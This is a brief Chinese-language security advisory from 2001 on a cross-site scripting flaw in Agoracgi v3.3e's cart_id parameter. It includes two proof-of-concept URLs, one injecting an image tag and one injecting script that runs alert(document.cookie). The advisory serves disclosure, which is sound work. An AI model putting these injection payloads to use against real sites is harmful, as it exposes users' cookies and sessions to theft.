Agoracgi v3.3e 存在跨站脚本漏洞发布时间:2001-12-18 更新时间:2001-12-18 严重程度:中 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Agoracgi v3.3e详细描述 Agoracgi存在一个跨站脚本可执行漏洞,问题在于动态站点没有很好的过滤用户 输入,导致COOKIE被泄露,执行一些命令等。 测试代码 http://www.agoracgi.com/store/agora.cgi?cart_id= ="http://www.securityoffice.net/images/title.gif"%20width=406%20border =0>&xm=on&product=HTML http://www.agoracgi.com/store/agora.cgi?cart_id=>alert(document .cookie)</script>&xm=on&product=HTML 解决方案 尚无 相关信息 Tamer Sahin ts@securityoffice.net http://www.securityoffice.net |